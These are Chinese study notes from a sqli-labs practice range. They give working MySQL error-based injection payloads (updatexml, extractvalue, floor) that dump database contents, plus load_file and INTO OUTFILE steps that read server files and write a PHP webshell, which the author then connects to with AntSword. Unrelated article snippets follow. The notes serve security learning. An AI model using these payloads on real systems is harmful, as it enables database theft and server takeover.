pipasound
pipasound

sql靶场练习笔记2

目录

环境:sqli靶场

Less-5 基于'字符型的错误回显注入

less-6 基于"字符型的错误回显注入

总结报错注入之updatexml语句:

总结报错注入之extractvalue语句: 

总结报错注入之floor语句: 

Less-7 文件读写注入

总结文件注入知识

一句话木马

环境:sqli靶场

Less-5 基于'字符型的错误回显注入

输入?id=1,页面正常  

输入?id=2',页面出现错误语句

尝试 ?id=1' order by 1,2,3 -- -   ,全是

sql靶场练习笔记2_第1张图片

说明页面没有显示位。无法使用联合查询注入 ,这里涉及一种新的知识:报错注入

?id=1' union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -

sql靶场练习笔记2_第2张图片

less-6 基于"字符型的错误回显注入

?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -

sql靶场练习笔记2_第3张图片

总结报错注入之updatexml语句:

语法:

payload:id='and(select(union select updatexml("anything",concat('~',(select语句())),"anyhing"))

例如:

'and(select updatexml(1,concat('~',(select database())),1))
'and(select updatexml(1,concat(0x7e,@@database),1)) 

针对mysql

爆数据库名:'and(select updatexml(1,concat(0x7e,(select database())),0x7e))
爆表名:'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))
爆列名:'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))
爆数据:'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

 注:

  •   0x7e=’~’
  •   concat(‘a’,‘b’)=“ab”
  •   database()=@@database
  •   ‘~‘可以换成’#’、’$'等不满足xpath格式的字符
  • 最长输出32位

总结报错注入之extractvalue语句: 

语法:

payload:id='and(select extractvalue("anything",concat('~',(select语句))))

例如

id='and(select extractvalue(1,concat('~',(select database()))))
id='and(select extractvalue(1,concat(0x7e,@@version)))

针对mysql:

查数据库名:id='and(select extractvalue(1,concat(0x7e,(select database()))))
爆表名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))
爆字段名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))
爆数据:id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))
  • 最长输出32位 

总结报错注入之floor语句: 

语法:

id=1' and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a) 

例如: 

floor():id=1’ and select count(*),(concat(floor(rand(0)*2),(select database())))x from users group by x --+  less-7 文件读写注入

第五题我们使用floor报错语句进行注入

?id=2' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

 sql靶场练习笔记2_第4张图片

  • 这里发现页面提示我输出信息超过一行,但我们已经使用了group_concat函数,说明这里数据库名组成的字符串长度超过了64位,所以我们需要放弃group_concat函数,而使用limit 0,1来一个个输出
  • group_concat()函数的作用:将返回信息拼接成一行显示
  • limit 0,1  表示输出第一个数据。   0表示输出的起始位置,1表示跨度为1(即输出几个数据,1表示输出一个,2就表示输出两个)

接着我们运用如下语句:

?id=2' and (select 1 from (select count(*),concat(((select schema_name from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

 sql靶场练习笔记2_第5张图片

 需要注意的是, 此时数据库名并不是 ctftraining1

这个1是floor报错语句中输出的也一部分(无论输出什么结果,都会有这个1)


Less-7 文件读写注入

这里我转入了自己的靶场,buuctf靶场解不出这道题

总结文件注入知识

一、读文件:

load_file()

以sqli- labs2为例

1.在E:/wamp64/tmp中写一个1.txt文件,并在里面写内容为“hello world!”。

 2,输入语句

这里注意:

  • 使用/来代替目录中的\ 
  • id一定要改成0或负数
?id=-1 union select 1,load_file('E:/wamp64/tmp/1.txt'),2

sql靶场练习笔记2_第6张图片

二、写文件:

into outfile()

以sqli- labs7为例 

写入sql语句,即可看到在E:/wamp64/tmp中出现了file.php文件

  • 数据库的file权限:规定了数据库用户是否有权限向操作系统内写入和读取已存在的权限
  • into outfile命令使用的环境:服务器上一个可以写入文件的文件夹的完整路径
?id=-1')) union select 1,2,3 into outfile 'E:/wamp64/tmp/file.php' --+

效果:

sql靶场练习笔记2_第7张图片

打开文件

sql靶场练习笔记2_第8张图片

三,这里有个坑,文件路径不是随便写的

sql靶场练习笔记2_第9张图片

打开my.ini  ,查看文件该放的路径--->

sql靶场练习笔记2_第10张图片

先试一试 ?id=1   页面回显正常

输入?id=1 and 1=2  页面仍回显正常

说明不是数值型注入

sql靶场练习笔记2_第11张图片

 输入?id=1'页面报错,说明可能存在"注入

依次次输入

  • ?id=1' --+ 页面显示异常
  • ?id=1') --+ 页面显示异常
  • ?id=1')) --+ 页面正常了

猜测注入语句

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

本关卡提示我们使用file权限向服务器写入文件,我们使用联合注入尝试写一下语句。这里我用的是wampserve环境

?id=-1')) union select 1,2,3 into outfile 'E:/wamp64/tmp/file.php' --+

sql靶场练习笔记2_第12张图片

需要注意的是利用数据库file权限向操作系统写入文件时, 对于相同文件名的文件不能覆盖,所以如果第一次上传file.php,下次在上传file.php,就是无效命令了,也就是新的file,php中的内容并不会覆盖之前的file.php 

一句话木马

我们再尝试上传一句话木马

文件上传--一句话木马详解

 

 

?id=-1')) union select 1,"",3 into outfile 'E:/wamp64/tmp/file2.php' -- -

sql靶场练习笔记2_第13张图片

将这个文件移到www目录下 

 sql靶场练习笔记2_第14张图片

上传成功,使用蚁剑连接木马

sql靶场练习笔记2_第15张图片

 连接成功

具体操作看这篇文章

你可能感兴趣的:(刷题记录,mysql学习笔记,sql,数据库,database)

  • hive表格统计信息不准确 weixin_41956627 hivehivehadoop数据仓库
    问题描述有个hive分区表,orc存储格式,有个分区,查询selectcount(1)fromtablewheredt='yyyyMMdd'结果是0,但查询select*fromtablewheredt='yyyyMMdd'又能查到数据,去hdfs对应目录下查看,也能看到有数据文件解决执行如下sqlANALYZETABLEdb.table1PARTITION(dt='20240908')COMPU
  • EFCore中利用原生sql进行联表/多表查询 xk_hypothesis EFCore
    EFCore中利用原生sql进行联表/多表查询EFCore的多表查询可以使用join,include这些进行查询,但是写起来比较复杂,它们一般适用于单表查询(个人觉得),对于多表查询,我更喜欢使用原生SQL这种方式。具体方式如下(这里以2张表关联为例):首先,创建两张数据库中对应的实体类:[Table("Sys_User")]publicclassSys_User{//////自增主键///[Ke
  • PostgreSQL 数组类型使用详解 捞起月亮的渔民丁 postgresql数据库
    PostgreSQL数组类型使用详解PostgreSQL数组类型使用详解可能大家对PostgreSQL这个关系型数据库不太熟悉,因为大部分人最熟悉的,公司用的最多的是MySQL我们先对PostgreSQL数据库(下面简称PG)简单的介绍一下,以后有机会,再单独写一篇专门介绍pgSql的文章TheWorld’sMostAdvancedOpenSourceRelationalDatabase这是PG官
  • this is incompatible with sql_mode=only_full_group_by解决方案 Biubbbbbbbbiu NavicatforMySQLsqlmysql数据库
    MySQL查询时报错:thisisincompatiblewithsql_mode=only_full_group_by报错原因分析:一、原理层面这个错误发生在mysql5.7.5版本及以上版本会出现的问题:mysql5.7.5版本以上默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准"。二、sql层面在sql执行时,出现该原因,简单
  • Web安全之SQL注入:如何预防及解决 J老熊 JavaWeb安全web安全sql数据库系统架构面试
    SQL注入(SQLInjection)是最常见的Web应用漏洞之一,它允许攻击者通过注入恶意SQL代码来操作数据库,获取、修改或删除数据。作为Java开发者,理解并防止SQL注入攻击是至关重要的。在本篇文章中,我们将详细介绍SQL注入的原理,演示如何在电商交易系统中出现SQL注入漏洞,并提供正确的防范措施和解决方案。1.什么是SQL注入?SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式
  • 在PostgreSQL中使用JSONB对象数组 weixin_26750481 javapython
    数据库提示(DatabaseTips)Inmylastarticle,wefocusedonturningaPostgreSQLjsonbcolumn,thatcontainedanArrayofObjects,intoarecordset,sothatitcouldbequeriedinarelationalmanner.在我的上一篇文章中,我们专注于将包含对象数组的PostgreSQLjson
  • 连接MySql报错Unable to load authentication plugin 'caching_sha2_password' 培根芝士 JavaSQL
    在使用mybatis-generator-maven-plugin:generate的时候报了一个Unabletoloadauthenticationplugin'caching_sha2_password'的错误。错误的原因是由于MySQL8.0之后的加密规则为caching_sha2_password,而在此之前的加密规则为mysql_native_password。解决方法:mysql-ur
  • SQL联表查询LEFT JOIN 数据去重复 培根芝士 SQLsql数据库
    使用leftjoin联表查询时,如果table1中的一条记录对应了table2的多条记录,则会重复查出id相同的多条记录。SELECTt1.*FROMtable1t1LEFTJOINtable2t2ONt1.id=t2.tid解决方法:将查询结果作为中间表,使用groupby进行去重SELECTtmp.*FROM(SELECTt1.*FROMtable1t1LEFTJOINtable2t2ONt1
  • JDBC客户端连接Starrocks 2.5 MARSERERER 数据库
    4.0.0org.exampleTestStarrocksJdbc1.0-SNAPSHOT88UTF-8mysqlmysql-connector-java5.1.47-->8.0.28maven-assembly-pluginjar-with-dependenciestruecom.example.Testmake-assemblypackagesinglepackagecom.example;i
  • postgresql 判断数据是否存在,存在更新,不存在则插入 llc的足迹 数据库postgresql
    INSERTINTOtable_name(create_time,update_time,name,latest_time)VALUES(NOW(),NOW(),'name''2023-04-2519:05:50')ONCONFLICT(name)DOUPDATESETupdate_time=NOW(),target_name='name',latest_time='2023-04-2519:05
  • flask sqlalchemy 动态创建表 llc的足迹 数据库flasksqlalchemy
    创建模型defget_model(suffix):classBaseModel(Base):__tablename__=f'table_{suffix}'__table_args__={'extend_existing':True}target_name=db.Column(db.String(64),nullable=False,unique=True,comment="名称")target_i
  • sqlalchemy判断表是否存在及动态创建表 llc的足迹 数据库sqlalchemy
    defget_model(suffix):classTableModel(Base):__tablename__=f'table_{suffix}'__table_args__={'extend_existing':True}name=db.Column(db.String(64),comment="名称")desc=db.Column(db.String(32),comment="描述")ret
  • 在TCGA上下载数据并且进行处理 Red Red 生信小技巧r语言数据库
    浏览器搜索TCGAGDC进入网站在TCGA数据库主页选择“Repository”模式根据所需要的选项在侧边栏选择数据清空购物车!!第一次登陆可忽略将刚刚选择好的数据加入购物车,并且在购物车里下载Metadata和Cart数据,下载到同一个文件夹下。使用R语言脚本对数据进行处理,将其提取为genesymbol和样本的数据,推荐看一下该博主处理数据!!真的非常详细!他R语言脚本在这个链接里
  • 人生苦短我用Python pandas文件格式转换 程序喵D 人生苦短我用Pythonpythonpandas
    人生苦短我用Pythonpandas文件格式转换前言示例1excel与csv互转常用格式的方法FlatfileExcelJSONXML示例2常用格式转换简要需求依赖export方法main方法附其它格式的方法HTMLPicklingClipboardLatexHDFStore:PyTables(HDF5)FeatherParquetORCSASSPSSSQLGoogleBigQuerySTATA前
  • 消息中间件之ActiveMQ — 07 筑梦之人 消息中间件MQjavaactivemq
    集群配置官方文档主备集群官方文档MasterSlaveTypeRequirementsProsConsSharedFileSystemMasterSlave共享文件系统,如SAN需要运行多个slave。当master挂掉之后会自动进行故障恢复需要共享文件系统JDBCMasterSlave共享数据库需要运行多个slave。当master挂掉之后会自动进行故障恢复需要一个共享的数据库。也相对缓慢,因为
  • this is incompatible with sql_mode=only_full_group_by解决 返回值 mysqlsqlmysql数据库
    项目场景:有时候,遇到数据库重复数据,需要将数据进行分组,并取出其中一条来展示,这时就需要用到groupby语句。但是,如果mysql是高版本,当执行groupby时,select的字段不属于groupby的字段的话,sql语句就会报错。报错信息如下:Expression#1ofSELECTlistisnotinGROUPBYclauseandcontainsnonaggregatedcolumn
  • mysql 查询报错 this is incompatible with sql_mode=only_full_group_by Wind Drift mysqlsql数据库
    InaggregatedquerywithoutGROUPBY,expression#1ofSELECTlistcontainsnonaggregatedcolumn‘smart_site.tc.company_name’;thisisincompatiblewithsql_mode=only_full_group_by原因:这个错误是由于MySQL的"ONLY_FULL_GROUP_BY"SQL
  • MySQL 进阶知识 A_cot mysql数据库前端bigdatadatabase
    当你掌握了基本的SQL语句和数据库操作后,进一步深入了解MySQL的进阶内容,将为你打开更广阔的数据管理和应用之门。一、存储过程与函数1.存储过程存储过程是一组为了完成特定功能的SQL语句集,经编译后存储在数据库中。存储过程可以接收参数、返回结果,并且可以被重复调用。优点:提高性能:存储过程在数据库服务器上执行,减少了网络传输和客户端处理的开销。增强安全性:可以限制对数据库的直接访问,通过存储过程
  • MySQL解决错误this is incompatible with sql_mode=only_full_group_by… 培根芝士 SQLmysqlsql数据库
    在SQL查询语句中加入groupby时报了以下错误:;badSQLgrammar[];nestedexceptionisjava.sql.SQLSyntaxErrorException:Expression#1ofSELECTlistisnotinGROUPBYclauseandcontainsnonaggregatedcolumn'user.varieties.id'whichisnotfunc
  • Postgresql 删除数组中的元素 llc的足迹 数据库postgresql数据库
    extra为{“a”:[null,3,null],“b”:111}使用sql将extra中a中的null移除第一步:首先先把[null,3,null]移除,selectjson_agg(elem)filter(whereelem!='null')from(selectjsonb_array_elements('[null,3,null]'::jsonb)aselem)t;这将得到[3]jsonb_
  • android系统设计模式 轻口味 Android系列android设计模式
    Android官方架构组件介绍之LifeCycle,Android架构组件一共包括以下几个:LifeCycle:与Activity和Fragment的生命周期有关LiveData:异步可订阅数据,也是生命周期感知ViewModel:视图数据持有模型,也是生命周期感知Room:SQLite抽象层,用于简化SQLite数据存储官网设计原则Android应用程序的开发使用Java编写,在架构上使用MVC
  • MVC和三层架构和Dao,service,controller的区别 xwh- mvc架构
    一。MVCMVC(Model-View-Controller)是一种常见的软件架构模式,用于组织和管理应用程序的代码。它将应用程序分为三个主要的组成部分:模型(Model)、视图(View)和控制器(Controller)。模型(Model):模型代表应用程序的数据和业务逻辑。它负责处理数据的读取、存储、验证和计算等操作,以及定义业务规则。模型是应用程序的核心,通常包含与数据库交互的代码。视图(V
  • 初见flyway simple哇 数据库数据库
    flyway(一种数据库版本控制工具document)两种文件V和RV:V开头是不可重复执行的文件,每次修改完都该更改名称R:R开头是可重复执行的文件,需要保证内部sql都是可以重复执行的名称格式:V__table_name.sql,R__table_name.sql操作baseline:以现在数据库状态为基准,创建flyway_schema_history表,以及相关信息填充[类似初始化]mig
  • Spring Boot 技术提升房屋租赁系统性能 2401_85763803 springboot后端java
    第2章技术介绍2.1相关技术房屋租赁系统是在JSP+MySQL开发环境的基础上开发的。JSP是一种服务器端脚本语言,易于学习,实用且面向用户。全球超过35%的JSP驱动的互联网站点使用JSP。MySQL是一个数据库管理系统,因为它的体积小但速度快,成本低,或者开源受到中小型网站的青睐。因此,JSP+MySQL作为一个成熟的开发环境,可以满足房屋租赁系统设计和开发所需的稳定性,安全性和可扩展性要求。
  • 数据库管理工具:如何使用 Navicat for MySQL 导出导入数据表 Excel 文件?_数据库设计表怎么导出 小猪佩琪962 2024年程序员学习数据库mysqlexcel
    文章目录前言一、使用Navicat导出数据表Excel文件1.1、使用“导出向导”选项1.2、选择数据库导出表的存放位置1.3、选择需要导出的栏位1.4、定义“导出向导”附加选项1.5、执行导出操作1.6、验证导出数据二、将数据表Excel文件导入Navicat2.1、使用“导入向导”选项2.2、选择导入文件数据源2.3、为导入文件定义附加选项2.4、设置目录表2.5、定义源栏位和目标栏位的对应关
  • 设计之道:ORM、DAO、Service与三层架构的规范探索 VaporGas Java后端重构java设计规范ORMDAOService三层架构
    引言:实际开发中,遵守一定的开发规范,不仅可以提高开发效率,还可以提高项目的后续维护性以及项目的扩展性;了解一下本博客的项目设计规范,对项目开发很有意义一、ORM思想ORM(Object-Relational-Mapping)在对象模型和关系型模型之间做一个映射(转换)。目的是为了解决面向对象编程语言的发展和关系型数据库的发展不匹配的问题可以理解为:将Java中的数据结构与MySQL数据库中的数据
  • visualforce page 古月的小七
    publicclassContactListController{privateStringsortOrder='LastName';publicListgetContacts(){Listresults=Database.query('SELECTId,FirstName,Title,LastName,EmailFROMContactORDERBYLastNameLIMIT10');return
  • 2019-11-01 ZxYi
    一、SQL语言内置函数代码:1.SQL视图CREATETABLE学生(学号CHAR(10)PRIMARYKEY,姓名CHAR(32),性别CHAR(1),出生日期DATETIME,婚否BIT,政治面貌CHAR(20),家庭住址CHAR(20),电话号码CHAR(15),系号CHAR(5));SELECTCOUNT(*或学号)AS人数FROM学生;SELECTMin(出生日期)AS最大年龄,Max(
  • mysql是后端还是前端_MySQL数据库之前端和后端的系统优化 草莓西瓜大桃子 mysql是后端还是前端
    本文中介绍的系统优化,主要针对前端和后台这两方面(后台方面主要对SQL语句和数据存储进行了优化),下文中我们将介绍一些优化技巧和经验。技巧:1.如何查出效率低的语句?在MySQL下,在启动参数中设置--log-slow-queries=[文件名],就可以在指定的日志文件中记录执行时间超过long_query_time(缺省为10秒)的SQL语句。你也可以在启动配置文件中修改longquery的时间
  • 使用java代码实现操作数据库的创建等系列操作 两点王爷 数据库javaoracle
    创作背景:使用代码实现对PostgreSQL数据库的创建用户、授权用户、删除用户系列操作!1、导入相关的依赖org.projectlomboklombokcn.hutoolhutool-all5.8.262、具体实现创建实体类@Data@ApiModel(value="EntityDataBase",description="实体数据库相关内容")publicclassEntityDataBase
  • Java开发中,spring mvc 的线程怎么调用? 小麦麦子 springmvc
    今天逛知乎,看到最近很多人都在问spring mvc 的线程http://www.maiziedu.com/course/java/ 的启动问题,觉得挺有意思的,那哥们儿问的也听仔细,下面的回答也很详尽,分享出来,希望遇对遇到类似问题的Java开发程序猿有所帮助。 问题:     在用spring mvc架构的网站上,设一线程在虚拟机启动时运行,线程里有一全局
  • maven依赖范围 bitcarter maven
    1.test 测试的时候才会依赖,编译和打包不依赖,如junit不被打包 2.compile 只有编译和打包时才会依赖 3.provided 编译和测试的时候依赖,打包不依赖,如:tomcat的一些公用jar包 4.runtime 运行时依赖,编译不依赖 5.默认compile 依赖范围compile是支持传递的,test不支持传递 1.传递的意思是项目A,引用
  • Jaxb org.xml.sax.saxparseexception : premature end of file darrenzhu xmlprematureJAXB
    如果在使用JAXB把xml文件unmarshal成vo(XSD自动生成的vo)时碰到如下错误: org.xml.sax.saxparseexception : premature end of file 很有可能时你直接读取文件为inputstream,然后将inputstream作为构建unmarshal需要的source参数。InputSource inputSource = new In
  • CSS Specificity 周凡杨 html权重Specificitycss
      有时候对于页面元素设置了样式,可为什么页面的显示没有匹配上呢? because specificity CSS 的选择符是有权重的,当不同的选择符的样式设置有冲突时,浏览器会采用权重高的选择符设置的样式。     规则:   HTML标签的权重是1 Class 的权重是10 Id 的权重是100
  • java与servlet g21121 servlet
    servlet 搞java web开发的人一定不会陌生,而且大家还会时常用到它。 下面是java官方网站上对servlet的介绍: java官网对于servlet的解释 写道 Java Servlet Technology Overview Servlets are the Java platform technology of choice for extending and enha
  • eclipse中安装maven插件 510888780 eclipsemaven
    1.首先去官网下载 Maven: http://www.apache.org/dyn/closer.cgi/maven/binaries/apache-maven-3.2.3-bin.tar.gz 下载完成之后将其解压, 我将解压后的文件夹:apache-maven-3.2.3, 并将它放在 D:\tools目录下, 即 maven 最终的路径是:D:\tools\apache-mave
  • jpa@OneToOne关联关系 布衣凌宇 jpa
    Nruser里的pruserid关联到Pruser的主键id,实现对一个表的增删改,另一个表的数据随之增删改。 Nruser实体类 //***************************************************************** @Entity @Table(name="nruser") @DynamicInsert @Dynam
  • 我的spring学习笔记11-Spring中关于声明式事务的配置 aijuans spring事务配置
    这两天学到事务管理这一块,结合到之前的terasoluna框架,觉得书本上讲的还是简单阿。我就把我从书本上学到的再结合实际的项目以及网上看到的一些内容,对声明式事务管理做个整理吧。我看得Spring in Action第二版中只提到了用TransactionProxyFactoryBean和<tx:advice/>,定义注释驱动这三种,我承认后两种的内容很好,很强大。但是实际的项目当中
  • java 动态代理简单实现 antlove javahandlerproxydynamicservice
    dynamicproxy.service.HelloService package dynamicproxy.service; public interface HelloService { public void sayHello(); }   dynamicproxy.service.impl.HelloServiceImpl package dynamicp
  • JDBC连接数据库 百合不是茶 JDBC编程JAVA操作oracle数据库
             如果我们要想连接oracle公司的数据库,就要首先下载oralce公司的驱动程序,将这个驱动程序的jar包导入到我们工程中;   JDBC链接数据库的代码和固定写法;     1,加载oracle数据库的驱动;     &nb
  • 单例模式中的多线程分析 bijian1013 javathread多线程java多线程
    谈到单例模式,我们立马会想到饿汉式和懒汉式加载,所谓饿汉式就是在创建类时就创建好了实例,懒汉式在获取实例时才去创建实例,即延迟加载。 饿汉式: package com.bijian.study; public class Singleton { private Singleton() { } // 注意这是private 只供内部调用 private static
  • javascript读取和修改原型特别需要注意原型的读写不具有对等性 bijian1013 JavaScriptprototype
            对于从原型对象继承而来的成员,其读和写具有内在的不对等性。比如有一个对象A,假设它的原型对象是B,B的原型对象是null。如果我们需要读取A对象的name属性值,那么JS会优先在A中查找,如果找到了name属性那么就返回;如果A中没有name属性,那么就到原型B中查找name,如果找到了就返回;如果原型B中也没有
  • 【持久化框架MyBatis3六】MyBatis3集成第三方DataSource bit1129 dataSource
    MyBatis内置了数据源的支持,如:   <environments default="development"> <environment id="development"> <transactionManager type="JDBC" /> <data
  • 我程序中用到的urldecode和base64decode,MD5 bitcarter cMD5base64decodeurldecode
    这里是base64decode和urldecode,Md5在附件中。因为我是在后台所以需要解码: string Base64Decode(const char* Data,int DataByte,int& OutByte) { //解码表 const char DecodeTable[] = { 0, 0, 0, 0, 0, 0
  • 腾讯资深运维专家周小军:QQ与微信架构的惊天秘密 ronin47
    社交领域一直是互联网创业的大热门,从PC到移动端,从OICQ、MSN到QQ。到了移动互联网时代,社交领域应用开始彻底爆发,直奔黄金期。腾讯在过去几年里,社交平台更是火到爆,QQ和微信坐拥几亿的粉丝,QQ空间和朋友圈各种刷屏,写心得,晒照片,秀视频,那么谁来为企鹅保驾护航呢?支撑QQ和微信海量数据背后的架构又有哪些惊天内幕呢?本期大讲堂的内容来自今年2月份ChinaUnix对腾讯社交网络运营服务中心
  • java-69-旋转数组的最小元素。把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个排好序的数组的一个旋转,输出旋转数组的最小元素 bylijinnan java
    public class MinOfShiftedArray { /** * Q69 旋转数组的最小元素 * 把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个排好序的数组的一个旋转,输出旋转数组的最小元素。 * 例如数组{3, 4, 5, 1, 2}为{1, 2, 3, 4, 5}的一个旋转,该数组的最小值为1。 */ publ
  • 看博客,应该是有方向的 Cb123456 反省看博客
    看博客,应该是有方向的:  我现在就复习以前的,在补补以前不会的,现在还不会的,同时完善完善项目,也看看别人的博客.  我刚突然想到的:  1.应该看计算机组成原理,数据结构,一些算法,还有关于android,java的。  2.对于我,也快大四了,看一些职业规划的,以及一些学习的经验,看看别人的工作总结的.    为什么要写
  • [开源与商业]做开源项目的人生活上一定要朴素,尽量减少对官方和商业体系的依赖 comsci 开源项目
         为什么这样说呢?  因为科学和技术的发展有时候需要一个平缓和长期的积累过程,但是行政和商业体系本身充满各种不稳定性和不确定性,如果你希望长期从事某个科研项目,但是却又必须依赖于某种行政和商业体系,那其中的过程必定充满各种风险。。。       所以,为避免这种不确定性风险,我
  • 一个 sql优化 ([精华] 一个查询优化的分析调整全过程!很值得一看 ) cwqcwqmax9 sql
    见   http://www.itpub.net/forum.php?mod=viewthread&tid=239011 Web翻页优化实例 提交时间: 2004-6-18 15:37:49      回复    发消息  环境: Linux ve
  • Hibernat and Ibatis dashuaifu Hibernateibatis
    Hibernate  VS  iBATIS 简介 Hibernate 是当前最流行的O/R mapping框架,当前版本是3.05。它出身于sf.net,现在已经成为Jboss的一部分了 iBATIS 是另外一种优秀的O/R mapping框架,当前版本是2.0。目前属于apache的一个子项目了。 相对Hibernate“O/R”而言,iBATIS 是一种“Sql Mappi
  • 备份MYSQL脚本 dcj3sjt126com mysql
    #!/bin/sh # this shell to backup mysql #[email protected] (QQ:1413161683 DuChengJiu) _dbDir=/var/lib/mysql/ _today=`date +%w` _bakDir=/usr/backup/$_today [ ! -d $_bakDir ] && mkdir -p
  • iOS第三方开源库的吐槽和备忘 dcj3sjt126com ios
    转自 ibireme的博客   做iOS开发总会接触到一些第三方库,这里整理一下,做一些吐槽。   目前比较活跃的社区仍旧是Github,除此以外也有一些不错的库散落在Google Code、SourceForge等地方。由于Github社区太过主流,这里主要介绍一下Github里面流行的iOS库。   首先整理了一份 Github上排名靠
  • html wlwmanifest.xml eoems htmlxml
    所谓优化wp_head()就是把从wp_head中移除不需要元素,同时也可以加快速度。 步骤: 加入到function.php remove_action('wp_head', 'wp_generator'); //wp-generator移除wordpress的版本号,本身blog的版本号没什么意义,但是如果让恶意玩家看到,可能会用官网公布的漏洞攻击blog remov
  • 浅谈Java定时器发展 hacksin java并发timer定时器
    java在jdk1.3中推出了定时器类Timer,而后在jdk1.5后由Dou Lea从新开发出了支持多线程的ScheduleThreadPoolExecutor,从后者的表现来看,可以考虑完全替代Timer了。 Timer与ScheduleThreadPoolExecutor对比: 1.    Timer始于jdk1.3,其原理是利用一个TimerTask数组当作队列
  • 移动端页面侧边导航滑入效果 ini jqueryWebhtml5cssjavascirpt
    效果体验:http://hovertree.com/texiao/mobile/2.htm可以使用移动设备浏览器查看效果。效果使用到jquery-2.1.4.min.js,该版本的jQuery库是用于支持HTML5的浏览器上,不再兼容IE8以前的浏览器,现在移动端浏览器一般都支持HTML5,所以使用该jQuery没问题。HTML文件代码: <!DOCTYPE html> <h
  • AspectJ+Javasist记录日志 kane_xie aspectjjavasist
    在项目中碰到这样一个需求,对一个服务类的每一个方法,在方法开始和结束的时候分别记录一条日志,内容包括方法名,参数名+参数值以及方法执行的时间。   @Override public String get(String key) { // long start = System.currentTimeMillis(); // System.out.println("Be
  • redis学习笔记 MJC410621 redisNoSQL
    1)nosql数据库主要由以下特点:非关系型的、分布式的、开源的、水平可扩展的。 1,处理超大量的数据 2,运行在便宜的PC服务器集群上, 3,击碎了性能瓶颈。 1)对数据高并发读写。 2)对海量数据的高效率存储和访问。 3)对数据的高扩展性和高可用性。 redis支持的类型: Sring 类型 set name lijie get name lijie set na
  • 使用redis实现分布式锁 qifeifei
    在多节点的系统中,如何实现分布式锁机制,其中用redis来实现是很好的方法之一,我们先来看一下jedis包中,有个类名BinaryJedis,它有个方法如下:   public Long setnx(final byte[] key, final byte[] value) { checkIsInMulti(); client.setnx(key, value); ret
  • BI并非万能,中层业务管理报表要另辟蹊径 张老师的菜 大数据BI商业智能信息化
           BI是商业智能的缩写,是可以帮助企业做出明智的业务经营决策的工具,其数据来源于各个业务系统,如ERP、CRM、SCM、进销存、HER、OA等。        BI系统不同于传统的管理信息系统,他号称是一个整体应用的解决方案,是融入管理思想的强大系统:有着系统整体的设计思想,支持对所有
  • 安装rvm后出现rvm not a function 或者ruby -v后提示没安装ruby的问题 wudixiaotie function
    1.在~/.bashrc最后加入 [[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"  2.重新启动terminal输入:   rvm use ruby-2.2.1 --default  把当前安装的ruby版本设为默
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他